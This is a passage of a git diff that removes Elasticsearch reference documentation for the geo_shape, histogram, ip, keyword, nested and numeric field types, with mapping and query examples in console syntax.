large even with a modest amount -of data. Additionally, the size of the features also matters. Big, complex -polygons can take up a lot of space at higher tree levels. Which setting -is right depends on the use case. Generally one trades off accuracy against -index size and query performance. - -The defaults in Elasticsearch for both implementations are a compromise -between index size and a reasonable level of precision of 50m at the -equator. This allows for indexing tens of millions of shapes without -overly bloating the resulting index too much relative to the input size. - -[NOTE] -Geo-shape queries on geo-shapes implemented with PrefixTrees will not be executed if -<> is set to false. - -[[input-structure]] -[discrete] -==== Input Structure - -Shapes can be represented using either the http://geojson.org[GeoJSON] -or https://docs.opengeospatial.org/is/12-063r5/12-063r5.html[Well-Known Text] -(WKT) format. The following table provides a mapping of GeoJSON and WKT -to Elasticsearch types: - -[cols="<,<,<,<",options="header",] -|======================================================================= -|GeoJSON Type |WKT Type |Elasticsearch Type |Description - -|`Point` |`POINT` |`point` |A single geographic coordinate. Note: Elasticsearch uses WGS-84 coordinates only. -|`LineString` |`LINESTRING` |`linestring` |An arbitrary line given two or more points. 
-|`Polygon` |`POLYGON` |`polygon` |A _closed_ polygon whose first and last point -must match, thus requiring `n + 1` vertices to create an `n`-sided -polygon and a minimum of `4` vertices. -|`MultiPoint` |`MULTIPOINT` |`multipoint` |An array of unconnected, but likely related -points. -|`MultiLineString` |`MULTILINESTRING` |`multilinestring` |An array of separate linestrings. -|`MultiPolygon` |`MULTIPOLYGON` |`multipolygon` |An array of separate polygons. -|`GeometryCollection` |`GEOMETRYCOLLECTION` |`geometrycollection` | A GeoJSON shape similar to the -`multi*` shapes except that multiple types can coexist (e.g., a Point -and a LineString). -|`N/A` |`BBOX` |`envelope` |A bounding rectangle, or envelope, specified by -specifying only the top left and bottom right points. -|`N/A` |`N/A` |`circle` |A circle specified by a center point and radius with -units, which default to `METERS`. -|======================================================================= - -[NOTE] -============================================= -For all types, both the inner `type` and `coordinates` fields are -required. - -In GeoJSON and WKT, and therefore Elasticsearch, the correct *coordinate -order is longitude, latitude (X, Y)* within coordinate arrays. This -differs from many Geospatial APIs (e.g., Google Maps) that generally -use the colloquial latitude, longitude (Y, X). -============================================= - -[[geo-point-type]] -[discrete] -===== http://geojson.org/geojson-spec.html#id2[Point] - -A point is a single geographic coordinate, such as the location of a -building or the current position given by a smartphone's Geolocation -API. The following is an example of a point in GeoJSON. - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : { - "type" : "point", - "coordinates" : [-77.03653, 38.897676] - } -} --------------------------------------------------- - -The following is an example of a point in WKT: - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : "POINT (-77.03653 38.897676)" -} --------------------------------------------------- - -[discrete] -[[geo-linestring]] -===== http://geojson.org/geojson-spec.html#id3[LineString] - -A `linestring` defined by an array of two or more positions. By -specifying only two points, the `linestring` will represent a straight -line. Specifying more than two points creates an arbitrary path. The -following is an example of a LineString in GeoJSON. - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : { - "type" : "linestring", - "coordinates" : [[-77.03653, 38.897676], [-77.009051, 38.889939]] - } -} --------------------------------------------------- - -The following is an example of a LineString in WKT: - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : "LINESTRING (-77.03653 38.897676, -77.009051 38.889939)" -} --------------------------------------------------- - -The above `linestring` would draw a straight line starting at the White -House to the US Capitol Building. - -[discrete] -[[geo-polygon]] -===== http://geojson.org/geojson-spec.html#id4[Polygon] - -A polygon is defined by a list of a list of points. The first and last -points in each (outer) list must be the same (the polygon must be -closed). The following is an example of a Polygon in GeoJSON. 
- -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : { - "type" : "polygon", - "coordinates" : [ - [ [100.0, 0.0], [101.0, 0.0], [101.0, 1.0], [100.0, 1.0], [100.0, 0.0] ] - ] - } -} --------------------------------------------------- - -The following is an example of a Polygon in WKT: - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : "POLYGON ((100.0 0.0, 101.0 0.0, 101.0 1.0, 100.0 1.0, 100.0 0.0))" -} --------------------------------------------------- - -The first array represents the outer boundary of the polygon, the other -arrays represent the interior shapes ("holes"). The following is a GeoJSON example -of a polygon with a hole: - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : { - "type" : "polygon", - "coordinates" : [ - [ [100.0, 0.0], [101.0, 0.0], [101.0, 1.0], [100.0, 1.0], [100.0, 0.0] ], - [ [100.2, 0.2], [100.8, 0.2], [100.8, 0.8], [100.2, 0.8], [100.2, 0.2] ] - ] - } -} --------------------------------------------------- - -The following is an example of a Polygon with a hole in WKT: - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : "POLYGON ((100.0 0.0, 101.0 0.0, 101.0 1.0, 100.0 1.0, 100.0 0.0), (100.2 0.2, 100.8 0.2, 100.8 0.8, 100.2 0.8, 100.2 0.2))" -} --------------------------------------------------- - -*IMPORTANT NOTE:* WKT does not enforce a specific order for vertices thus -ambiguous polygons around the dateline and poles are possible. -https://tools.ietf.org/html/rfc7946#section-3.1.6[GeoJSON] mandates that the -outer polygon must be counterclockwise and interior shapes must be clockwise, -which agrees with the Open Geospatial Consortium (OGC) -https://www.opengeospatial.org/standards/sfa[Simple Feature Access] -specification for vertex ordering. - -Elasticsearch accepts both clockwise and counterclockwise polygons if they -appear not to cross the dateline (i.e. they cross less than 180° of longitude), -but for polygons that do cross the dateline (or for other polygons wider than -180°) Elasticsearch requires the vertex ordering to comply with the OGC and -GeoJSON specifications. Otherwise, an unintended polygon may be created and -unexpected query/filter results will be returned. - -The following provides an example of an ambiguous polygon. Elasticsearch will -apply the GeoJSON standard to eliminate ambiguity resulting in a polygon that -crosses the dateline. - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : { - "type" : "polygon", - "coordinates" : [ - [ [-177.0, 10.0], [176.0, 15.0], [172.0, 0.0], [176.0, -15.0], [-177.0, -10.0], [-177.0, 10.0] ], - [ [178.2, 8.2], [-178.8, 8.2], [-180.8, -8.8], [178.2, 8.8] ] - ] - } -} --------------------------------------------------- -// TEST[catch:/mapper_parsing_exception/] - -An `orientation` parameter can be defined when setting the geo_shape mapping (see <>). This will define vertex -order for the coordinate list on the mapped geo_shape field. It can also be overridden on each document. 
The following is an example for -overriding the orientation on a document: - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : { - "type" : "polygon", - "orientation" : "clockwise", - "coordinates" : [ - [ [100.0, 0.0], [100.0, 1.0], [101.0, 1.0], [101.0, 0.0], [100.0, 0.0] ] - ] - } -} --------------------------------------------------- - -[discrete] -[[geo-multipoint]] -===== http://geojson.org/geojson-spec.html#id5[MultiPoint] - -The following is an example of a list of geojson points: - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : { - "type" : "multipoint", - "coordinates" : [ - [102.0, 2.0], [103.0, 2.0] - ] - } -} --------------------------------------------------- - -The following is an example of a list of WKT points: - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : "MULTIPOINT (102.0 2.0, 103.0 2.0)" -} --------------------------------------------------- - -[discrete] -[[geo-multilinestring]] -===== http://geojson.org/geojson-spec.html#id6[MultiLineString] - -The following is an example of a list of geojson linestrings: - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : { - "type" : "multilinestring", - "coordinates" : [ - [ [102.0, 2.0], [103.0, 2.0], [103.0, 3.0], [102.0, 3.0] ], - [ [100.0, 0.0], [101.0, 0.0], [101.0, 1.0], [100.0, 1.0] ], - [ [100.2, 0.2], [100.8, 0.2], [100.8, 0.8], [100.2, 0.8] ] - ] - } -} --------------------------------------------------- - -The following is an example of a list of WKT linestrings: - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : "MULTILINESTRING ((102.0 2.0, 103.0 2.0, 103.0 3.0, 102.0 3.0), (100.0 0.0, 101.0 0.0, 101.0 1.0, 100.0 1.0), (100.2 0.2, 100.8 0.2, 100.8 0.8, 100.2 0.8))" -} --------------------------------------------------- - -[discrete] -[[geo-multipolygon]] -===== http://geojson.org/geojson-spec.html#id7[MultiPolygon] - -The following is an example of a list of geojson polygons (second polygon contains a hole): - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : { - "type" : "multipolygon", - "coordinates" : [ - [ [[102.0, 2.0], [103.0, 2.0], [103.0, 3.0], [102.0, 3.0], [102.0, 2.0]] ], - [ [[100.0, 0.0], [101.0, 0.0], [101.0, 1.0], [100.0, 1.0], [100.0, 0.0]], - [[100.2, 0.2], [100.8, 0.2], [100.8, 0.8], [100.2, 0.8], [100.2, 0.2]] ] - ] - } -} --------------------------------------------------- - -The following is an example of a list of WKT polygons (second polygon contains a hole): - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : "MULTIPOLYGON (((102.0 2.0, 103.0 2.0, 103.0 3.0, 102.0 3.0, 102.0 2.0)), ((100.0 0.0, 101.0 0.0, 101.0 1.0, 100.0 1.0, 100.0 0.0), (100.2 0.2, 100.8 0.2, 100.8 0.8, 100.2 0.8, 100.2 0.2)))" -} --------------------------------------------------- - -[discrete] -[[geo-geometry_collection]] -===== http://geojson.org/geojson-spec.html#geometrycollection[Geometry Collection] - -The following is an example of a collection of geojson geometry objects: - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : { - "type": "geometrycollection", - "geometries": [ - { - "type": "point", - "coordinates": [100.0, 0.0] - }, - { - "type": 
"linestring", - "coordinates": [ [101.0, 0.0], [102.0, 1.0] ] - } - ] - } -} --------------------------------------------------- - -The following is an example of a collection of WKT geometry objects: - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : "GEOMETRYCOLLECTION (POINT (100.0 0.0), LINESTRING (101.0 0.0, 102.0 1.0))" -} --------------------------------------------------- - - -[discrete] -===== Envelope - -Elasticsearch supports an `envelope` type, which consists of coordinates -for upper left and lower right points of the shape to represent a -bounding rectangle in the format `[[minLon, maxLat], [maxLon, minLat]]`: - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : { - "type" : "envelope", - "coordinates" : [ [100.0, 1.0], [101.0, 0.0] ] - } -} --------------------------------------------------- - -The following is an example of an envelope using the WKT BBOX format: - -*NOTE:* WKT specification expects the following order: minLon, maxLon, maxLat, minLat. - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : "BBOX (100.0, 102.0, 2.0, 0.0)" -} --------------------------------------------------- - -[discrete] -===== Circle - -Elasticsearch supports a `circle` type, which consists of a center -point with a radius. Note that this circle representation can only -be indexed when using the `recursive` Prefix Tree strategy. For -the default <> circles should be approximated using -a `POLYGON`. - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : { - "type" : "circle", - "coordinates" : [101.0, 1.0], - "radius" : "100m" - } -} --------------------------------------------------- -// TEST[skip:not supported in default] - -Note: The inner `radius` field is required. If not specified, then -the units of the `radius` will default to `METERS`. - -*NOTE:* Neither GeoJSON or WKT support a point-radius circle type. - -[discrete] -==== Sorting and Retrieving index Shapes - -Due to the complex input structure and index representation of shapes, -it is not currently possible to sort shapes or retrieve their fields -directly. The geo_shape value is only retrievable through the `_source` -field. diff --git a/docs/reference/mapping/types/histogram.asciidoc b/docs/reference/mapping/types/histogram.asciidoc deleted file mode 100644 index e47ea875e1a..00000000000 --- a/docs/reference/mapping/types/histogram.asciidoc +++ /dev/null @@ -1,122 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[histogram]] -=== Histogram field type -++++ -Histogram -++++ - -A field to store pre-aggregated numerical data representing a histogram. -This data is defined using two paired arrays: - -* A `values` array of <> numbers, representing the buckets for -the histogram. These values must be provided in ascending order. -* A corresponding `counts` array of <> numbers, representing how -many values fall into each bucket. These numbers must be positive or zero. - -Because the elements in the `values` array correspond to the elements in the -same position of the `count` array, these two arrays must have the same length. - -[IMPORTANT] -======== -* A `histogram` field can only store a single pair of `values` and `count` arrays -per document. Nested arrays are not supported. -* `histogram` fields do not support sorting. 
-======== - -[[histogram-uses]] -==== Uses - -`histogram` fields are primarily intended for use with aggregations. To make it -more readily accessible for aggregations, `histogram` field data is stored as a -binary <> and not indexed. Its size in bytes is at most -`13 * numValues`, where `numValues` is the length of the provided arrays. - -Because the data is not indexed, you only can use `histogram` fields for the -following aggregations and queries: - -* <> aggregation -* <> aggregation -* <> aggregation -* <> aggregation -* <> aggregation -* <> aggregation -* <> aggregation -* <> aggregation -* <> aggregation -* <> query - -[[mapping-types-histogram-building-histogram]] -==== Building a histogram - -When using a histogram as part of an aggregation, the accuracy of the results will depend on how the -histogram was constructed. It is important to consider the percentiles aggregation mode that will be used -to build it. Some possibilities include: - -- For the <> mode, the `values` array represents -the mean centroid positions and the `counts` array represents the number of values that are attributed to each -centroid. If the algorithm has already started to approximate the percentiles, this inaccuracy is -carried over in the histogram. - -- For the <<_hdr_histogram,High Dynamic Range (HDR)>> histogram mode, the `values` array represents fixed upper -limits of each bucket interval, and the `counts` array represents the number of values that are attributed to each -interval. This implementation maintains a fixed worse-case percentage error (specified as a number of significant digits), -therefore the value used when generating the histogram would be the maximum accuracy you can achieve at aggregation time. - -The histogram field is "algorithm agnostic" and does not store data specific to either T-Digest or HDRHistogram. While this -means the field can technically be aggregated with either algorithm, in practice the user should chose one algorithm and -index data in that manner (e.g. centroids for T-Digest or intervals for HDRHistogram) to ensure best accuracy. - -[[histogram-ex]] -==== Examples - -The following <> API request creates a new index with two field mappings: - -* `my_histogram`, a `histogram` field used to store percentile data -* `my_text`, a `keyword` field used to store a title for the histogram - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings" : { - "properties" : { - "my_histogram" : { - "type" : "histogram" - }, - "my_text" : { - "type" : "keyword" - } - } - } -} --------------------------------------------------- - -The following <> API requests store pre-aggregated for -two histograms: `histogram_1` and `histogram_2`. - -[source,console] --------------------------------------------------- -PUT my-index-000001/_doc/1 -{ - "my_text" : "histogram_1", - "my_histogram" : { - "values" : [0.1, 0.2, 0.3, 0.4, 0.5], <1> - "counts" : [3, 7, 23, 12, 6] <2> - } -} - -PUT my-index-000001/_doc/2 -{ - "my_text" : "histogram_2", - "my_histogram" : { - "values" : [0.1, 0.25, 0.35, 0.4, 0.45, 0.5], <1> - "counts" : [8, 17, 8, 7, 6, 2] <2> - } -} --------------------------------------------------- -<1> Values for each bucket. Values in the array are treated as doubles and must be given in -increasing order. For <> -histograms this value represents the mean value. In case of HDR histograms this represents the value iterated to. -<2> Count for each bucket. Values in the arrays are treated as integers and must be positive or zero. 
-Negative values will be rejected. The relation between a bucket and a count is given by the position in the array. diff --git a/docs/reference/mapping/types/ip.asciidoc b/docs/reference/mapping/types/ip.asciidoc deleted file mode 100644 index c8336cd816b..00000000000 --- a/docs/reference/mapping/types/ip.asciidoc +++ /dev/null @@ -1,127 +0,0 @@ -[[ip]] -=== IP field type -++++ -IP -++++ - -An `ip` field can index/store either {wikipedia}/IPv4[IPv4] or -{wikipedia}/IPv6[IPv6] addresses. - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "ip_addr": { - "type": "ip" - } - } - } -} - -PUT my-index-000001/_doc/1 -{ - "ip_addr": "192.168.1.1" -} - -GET my-index-000001/_search -{ - "query": { - "term": { - "ip_addr": "192.168.0.0/16" - } - } -} --------------------------------------------------- -// TESTSETUP - -NOTE: You can also store ip ranges in a single field using an <>. - -[[ip-params]] -==== Parameters for `ip` fields - -The following parameters are accepted by `ip` fields: - -[horizontal] - -<>:: - - Mapping field-level query time boosting. Accepts a floating point number, defaults - to `1.0`. - -<>:: - - Should the field be stored on disk in a column-stride fashion, so that it - can later be used for sorting, aggregations, or scripting? Accepts `true` - (default) or `false`. - -<>:: - - If `true`, malformed IP addresses are ignored. If `false` (default), malformed - IP addresses throw an exception and reject the whole document. - -<>:: - - Should the field be searchable? Accepts `true` (default) and `false`. - -<>:: - - Accepts an IPv4 or IPv6 value which is substituted for any explicit `null` values. - Defaults to `null`, which means the field is treated as missing. - -<>:: - - Whether the field value should be stored and retrievable separately from - the <> field. Accepts `true` or `false` - (default). - -[[query-ip-fields]] -==== Querying `ip` fields - -The most common way to query ip addresses is to use the -{wikipedia}/Classless_Inter-Domain_Routing#CIDR_notation[CIDR] -notation: `[ip_address]/[prefix_length]`. For instance: - -[source,console] --------------------------------------------------- -GET my-index-000001/_search -{ - "query": { - "term": { - "ip_addr": "192.168.0.0/16" - } - } -} --------------------------------------------------- - -or - -[source,console] --------------------------------------------------- -GET my-index-000001/_search -{ - "query": { - "term": { - "ip_addr": "2001:db8::/48" - } - } -} --------------------------------------------------- - -Also beware that colons are special characters to the -<> query, so ipv6 addresses will -need to be escaped. The easiest way to do so is to put quotes around the -searched value: - -[source,console] --------------------------------------------------- -GET my-index-000001/_search -{ - "query": { - "query_string" : { - "query": "ip_addr:\"2001:db8::/48\"" - } - } -} --------------------------------------------------- diff --git a/docs/reference/mapping/types/keyword.asciidoc b/docs/reference/mapping/types/keyword.asciidoc deleted file mode 100644 index b97af789f3b..00000000000 --- a/docs/reference/mapping/types/keyword.asciidoc +++ /dev/null @@ -1,137 +0,0 @@ -[testenv="basic"] -[[keyword]] -=== Keyword type family -++++ -Keyword -++++ - -The keyword family includes the following field types: - -* <>, which is used for structured content such as IDs, email -addresses, hostnames, status codes, zip codes, or tags. 
-* <> for keyword fields that always contain -the same value. -* <>, which optimizes log lines and similar keyword values -for grep-like <>. - -Keyword fields are often used in <>, -<>, and <>, such as <>. - -TIP: Avoid using keyword fields for full-text search. Use the <> -field type instead. - -[discrete] -[[keyword-field-type]] -=== Keyword field type - -Below is an example of a mapping for a basic `keyword` field: - -[source,console] --------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "tags": { - "type": "keyword" - } - } - } -} --------------------------------- - -[TIP] -.Mapping numeric identifiers -==== -include::numeric.asciidoc[tag=map-ids-as-keyword] -==== - -[discrete] -[[keyword-params]] -==== Parameters for basic keyword fields - -The following parameters are accepted by `keyword` fields: - -[horizontal] - -<>:: - - Mapping field-level query time boosting. Accepts a floating point number, defaults - to `1.0`. - -<>:: - - Should the field be stored on disk in a column-stride fashion, so that it - can later be used for sorting, aggregations, or scripting? Accepts `true` - (default) or `false`. - -<>:: - - Should global ordinals be loaded eagerly on refresh? Accepts `true` or `false` - (default). Enabling this is a good idea on fields that are frequently used for - terms aggregations. - -<>:: - - Multi-fields allow the same string value to be indexed in multiple ways for - different purposes, such as one field for search and a multi-field for - sorting and aggregations. - -<>:: - - Do not index any string longer than this value. Defaults to `2147483647` - so that all values would be accepted. Please however note that default - dynamic mapping rules create a sub `keyword` field that overrides this - default by setting `ignore_above: 256`. - -<>:: - - Should the field be searchable? Accepts `true` (default) or `false`. - -<>:: - - What information should be stored in the index, for scoring purposes. - Defaults to `docs` but can also be set to `freqs` to take term frequency into account - when computing scores. - -<>:: - - Whether field-length should be taken into account when scoring queries. - Accepts `true` or `false` (default). - -<>:: - - Accepts a string value which is substituted for any explicit `null` - values. Defaults to `null`, which means the field is treated as missing. - -<>:: - - Whether the field value should be stored and retrievable separately from - the <> field. Accepts `true` or `false` - (default). - -<>:: - - Which scoring algorithm or _similarity_ should be used. Defaults - to `BM25`. - -<>:: - - How to pre-process the keyword prior to indexing. Defaults to `null`, - meaning the keyword is kept as-is. - -`split_queries_on_whitespace`:: - - Whether <> should split the input on whitespace - when building a query for this field. - Accepts `true` or `false` (default). - -<>:: - - Metadata about the field. - -include::constant-keyword.asciidoc[] - -include::wildcard.asciidoc[] - diff --git a/docs/reference/mapping/types/nested.asciidoc b/docs/reference/mapping/types/nested.asciidoc deleted file mode 100644 index 20057d9ccd7..00000000000 --- a/docs/reference/mapping/types/nested.asciidoc +++ /dev/null @@ -1,235 +0,0 @@ -[[nested]] -=== Nested field type -++++ -Nested -++++ - -The `nested` type is a specialised version of the <> data type -that allows arrays of objects to be indexed in a way that they can be queried -independently of each other. 
- -TIP: When ingesting key-value pairs with a large, arbitrary set of keys, you might consider modeling each key-value pair as its own nested document with `key` and `value` fields. Instead, consider using the <> data type, which maps an entire object as a single field and allows for simple searches over its contents. -Nested documents and queries are typically expensive, so using the `flattened` data type for this use case is a better option. - -[[nested-arrays-flattening-objects]] -==== How arrays of objects are flattened - -Elasticsearch has no concept of inner objects. Therefore, it flattens object -hierarchies into a simple list of field names and values. For instance, consider the -following document: - -[source,console] --------------------------------------------------- -PUT my-index-000001/_doc/1 -{ - "group" : "fans", - "user" : [ <1> - { - "first" : "John", - "last" : "Smith" - }, - { - "first" : "Alice", - "last" : "White" - } - ] -} --------------------------------------------------- - -<1> The `user` field is dynamically added as a field of type `object`. - -The previous document would be transformed internally into a document that looks more like this: - -[source,js] --------------------------------------------------- -{ - "group" : "fans", - "user.first" : [ "alice", "john" ], - "user.last" : [ "smith", "white" ] -} --------------------------------------------------- -// NOTCONSOLE - -The `user.first` and `user.last` fields are flattened into multi-value fields, -and the association between `alice` and `white` is lost. This document would -incorrectly match a query for `alice AND smith`: - -[source,console] --------------------------------------------------- -GET my-index-000001/_search -{ - "query": { - "bool": { - "must": [ - { "match": { "user.first": "Alice" }}, - { "match": { "user.last": "Smith" }} - ] - } - } -} --------------------------------------------------- -// TEST[continued] - -[[nested-fields-array-objects]] -==== Using `nested` fields for arrays of objects - -If you need to index arrays of objects and to maintain the independence of -each object in the array, use the `nested` data type instead of the -<> data type. - -Internally, nested objects index each object in -the array as a separate hidden document, meaning that each nested object can be -queried independently of the others with the <>: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "user": { - "type": "nested" <1> - } - } - } -} - -PUT my-index-000001/_doc/1 -{ - "group" : "fans", - "user" : [ - { - "first" : "John", - "last" : "Smith" - }, - { - "first" : "Alice", - "last" : "White" - } - ] -} - -GET my-index-000001/_search -{ - "query": { - "nested": { - "path": "user", - "query": { - "bool": { - "must": [ - { "match": { "user.first": "Alice" }}, - { "match": { "user.last": "Smith" }} <2> - ] - } - } - } - } -} - -GET my-index-000001/_search -{ - "query": { - "nested": { - "path": "user", - "query": { - "bool": { - "must": [ - { "match": { "user.first": "Alice" }}, - { "match": { "user.last": "White" }} <3> - ] - } - }, - "inner_hits": { <4> - "highlight": { - "fields": { - "user.first": {} - } - } - } - } - } -} --------------------------------------------------- - -<1> The `user` field is mapped as type `nested` instead of type `object`. -<2> This query doesn't match because `Alice` and `Smith` are not in the same nested object. -<3> This query matches because `Alice` and `White` are in the same nested object. 
-<4> `inner_hits` allow us to highlight the matching nested documents. - - -[[nested-accessing-documents]] -==== Interacting with `nested` documents -Nested documents can be: - -* queried with the <> query. -* analyzed with the <> - and <> - aggregations. -* sorted with <>. -* retrieved and highlighted with <>. - -[IMPORTANT] -============================================= - -Because nested documents are indexed as separate documents, they can only be -accessed within the scope of the `nested` query, the -`nested`/`reverse_nested` aggregations, or <>. - -For instance, if a string field within a nested document has -<> set to `offsets` to allow use of the postings -during the highlighting, these offsets will not be available during the main highlighting -phase. Instead, highlighting needs to be performed via -<>. The same consideration applies when loading -fields during a search through <> or <>. - -============================================= - -[[nested-params]] -==== Parameters for `nested` fields - -The following parameters are accepted by `nested` fields: - -<>:: -(Optional, string) -Whether or not new `properties` should be added dynamically to an existing -nested object. Accepts `true` (default), `false` and `strict`. - -<>:: -(Optional, object) -The fields within the nested object, which can be of any -<>, including `nested`. New properties -may be added to an existing nested object. - -[[nested-include-in-parent-parm]] -`include_in_parent`:: -(Optional, Boolean) -If `true`, all fields in the nested object are also added to the parent document -as standard (flat) fields. Defaults to `false`. - -[[nested-include-in-root-parm]] -`include_in_root`:: -(Optional, Boolean) -If `true`, all fields in the nested object are also added to the root -document as standard (flat) fields. Defaults to `false`. - -[discrete] -=== Limits on `nested` mappings and objects - -As described earlier, each nested object is indexed as a separate Lucene document. -Continuing with the previous example, if we indexed a single document containing 100 `user` objects, -then 101 Lucene documents would be created: one for the parent document, and one for each -nested object. Because of the expense associated with `nested` mappings, Elasticsearch puts -settings in place to guard against performance problems: - -include::{es-repo-dir}/mapping.asciidoc[tag=nested-fields-limit] - -In the previous example, the `user` mapping would count as only 1 towards this limit. - -include::{es-repo-dir}/mapping.asciidoc[tag=nested-objects-limit] - -To illustrate how this setting works, consider adding another `nested` type called `comments` -to the previous example mapping. For each document, the combined number of `user` and `comment` -objects it contains must be below the limit. - -See <> regarding additional settings for preventing mappings explosion. diff --git a/docs/reference/mapping/types/numeric.asciidoc b/docs/reference/mapping/types/numeric.asciidoc deleted file mode 100644 index d6f4be0a8dc..00000000000 --- a/docs/reference/mapping/types/numeric.asciidoc +++ /dev/null @@ -1,172 +0,0 @@ -[[number]] -=== Numeric field types -++++ -Numeric -++++ - -The following numeric types are supported: - -[horizontal] -`long`:: A signed 64-bit integer with a minimum value of +-2^63^+ and a maximum value of +2^63^-1+. -`integer`:: A signed 32-bit integer with a minimum value of +-2^31^+ and a maximum value of +2^31^-1+. -`short`:: A signed 16-bit integer with a minimum value of +-32,768+ and a maximum value of +32,767+. 
-`byte`:: A signed 8-bit integer with a minimum value of +-128+ and a maximum value of +127+. -`double`:: A double-precision 64-bit IEEE 754 floating point number, restricted to finite values. -`float`:: A single-precision 32-bit IEEE 754 floating point number, restricted to finite values. -`half_float`:: A half-precision 16-bit IEEE 754 floating point number, restricted to finite values. -`scaled_float`:: A floating point number that is backed by a `long`, scaled by a fixed `double` scaling factor. -`unsigned_long`:: An unsigned 64-bit integer with a minimum value of 0 and a maximum value of +2^64^-1+. - -Below is an example of configuring a mapping with numeric fields: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "number_of_bytes": { - "type": "integer" - }, - "time_in_seconds": { - "type": "float" - }, - "price": { - "type": "scaled_float", - "scaling_factor": 100 - } - } - } -} --------------------------------------------------- - -NOTE: The `double`, `float` and `half_float` types consider that `-0.0` and -`+0.0` are different values. As a consequence, doing a `term` query on -`-0.0` will not match `+0.0` and vice-versa. Same is true for range queries: -if the upper bound is `-0.0` then `+0.0` will not match, and if the lower -bound is `+0.0` then `-0.0` will not match. - -==== Which type should I use? - -As far as integer types (`byte`, `short`, `integer` and `long`) are concerned, -you should pick the smallest type which is enough for your use-case. This will -help indexing and searching be more efficient. Note however that storage is -optimized based on the actual values that are stored, so picking one type over -another one will have no impact on storage requirements. - -For floating-point types, it is often more efficient to store floating-point -data into an integer using a scaling factor, which is what the `scaled_float` -type does under the hood. For instance, a `price` field could be stored in a -`scaled_float` with a `scaling_factor` of +100+. All APIs would work as if -the field was stored as a double, but under the hood Elasticsearch would be -working with the number of cents, +price*100+, which is an integer. This is -mostly helpful to save disk space since integers are way easier to compress -than floating points. `scaled_float` is also fine to use in order to trade -accuracy for disk space. For instance imagine that you are tracking cpu -utilization as a number between +0+ and +1+. It usually does not matter much -whether cpu utilization is +12.7%+ or +13%+, so you could use a `scaled_float` -with a `scaling_factor` of +100+ in order to round cpu utilization to the -closest percent in order to save space. - -If `scaled_float` is not a good fit, then you should pick the smallest type -that is enough for the use-case among the floating-point types: `double`, -`float` and `half_float`. Here is a table that compares these types in order -to help make a decision. 
- -[cols="<,<,<,<",options="header",] -|======================================================================= -|Type |Minimum value |Maximum value |Significant bits / digits -|`double`|+2^-1074^+ |+(2-2^-52^)·2^1023^+ |+53+ / +15.95+ -|`float`|+2^-149^+ |+(2-2^-23^)·2^127^+ |+24+ / +7.22+ -|`half_float`|+2^-24^+ |+65504+ |+11+ / +3.31+ -|======================================================================= - -[TIP] -.Mapping numeric identifiers -==== -// tag::map-ids-as-keyword[] -Not all numeric data should be mapped as a <> field data type. -{es} optimizes numeric fields, such as `integer` or `long`, for -<> queries. However, <> fields -are better for <> and other -<> queries. - -Identifiers, such as an ISBN or a product ID, are rarely used in `range` -queries. However, they are often retrieved using term-level queries. - -Consider mapping a numeric identifier as a `keyword` if: - -* You don't plan to search for the identifier data using - <> queries. -* Fast retrieval is important. `term` query searches on `keyword` fields are - often faster than `term` searches on numeric fields. - -If you're unsure which to use, you can use a <> to map -the data as both a `keyword` _and_ a numeric data type. -// end::map-ids-as-keyword[] -==== - -[[number-params]] -==== Parameters for numeric fields - -The following parameters are accepted by numeric types: - -[horizontal] - -<>:: - - Try to convert strings to numbers and truncate fractions for integers. - Accepts `true` (default) and `false`. Not applicable for `unsigned_long`. - -<>:: - - Mapping field-level query time boosting. Accepts a floating point number, defaults - to `1.0`. - -<>:: - - Should the field be stored on disk in a column-stride fashion, so that it - can later be used for sorting, aggregations, or scripting? Accepts `true` - (default) or `false`. - -<>:: - - If `true`, malformed numbers are ignored. If `false` (default), malformed - numbers throw an exception and reject the whole document. - -<>:: - - Should the field be searchable? Accepts `true` (default) and `false`. - -<>:: - - Accepts a numeric value of the same `type` as the field which is - substituted for any explicit `null` values. Defaults to `null`, which - means the field is treated as missing. - -<>:: - - Whether the field value should be stored and retrievable separately from - the <> field. Accepts `true` or `false` - (default). - -<>:: - - Metadata about the field. - -[[scaled-float-params]] -==== Parameters for `scaled_float` - -`scaled_float` accepts an additional parameter: - -[horizontal] - -`scaling_factor`:: - - The scaling factor to use when encoding values. Values will be multiplied - by this factor at index time and rounded to the closest long value. For - instance, a `scaled_float` with a `scaling_factor` of +10+ would internally - store +2.34+ as +23+ and all search-time operations (queries, aggregations, - sorting) will behave as if the document had a value of +2.3+. High values - of `scaling_factor` improve accuracy but also increase space requirements. - This parameter is required. 
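To make the scaling behaviour concrete, here is a minimal sketch (the index name `my-index-000002` and the `price` field are chosen only for this illustration) that indexes a value with a `scaling_factor` of `100`:

[source,console]
--------------------------------------------------
PUT my-index-000002
{
  "mappings": {
    "properties": {
      "price": {
        "type": "scaled_float",
        "scaling_factor": 100 <1>
      }
    }
  }
}

PUT my-index-000002/_doc/1
{
  "price": 10.994 <2>
}
--------------------------------------------------

<1> Each value is multiplied by `100` at index time and rounded to the closest long.
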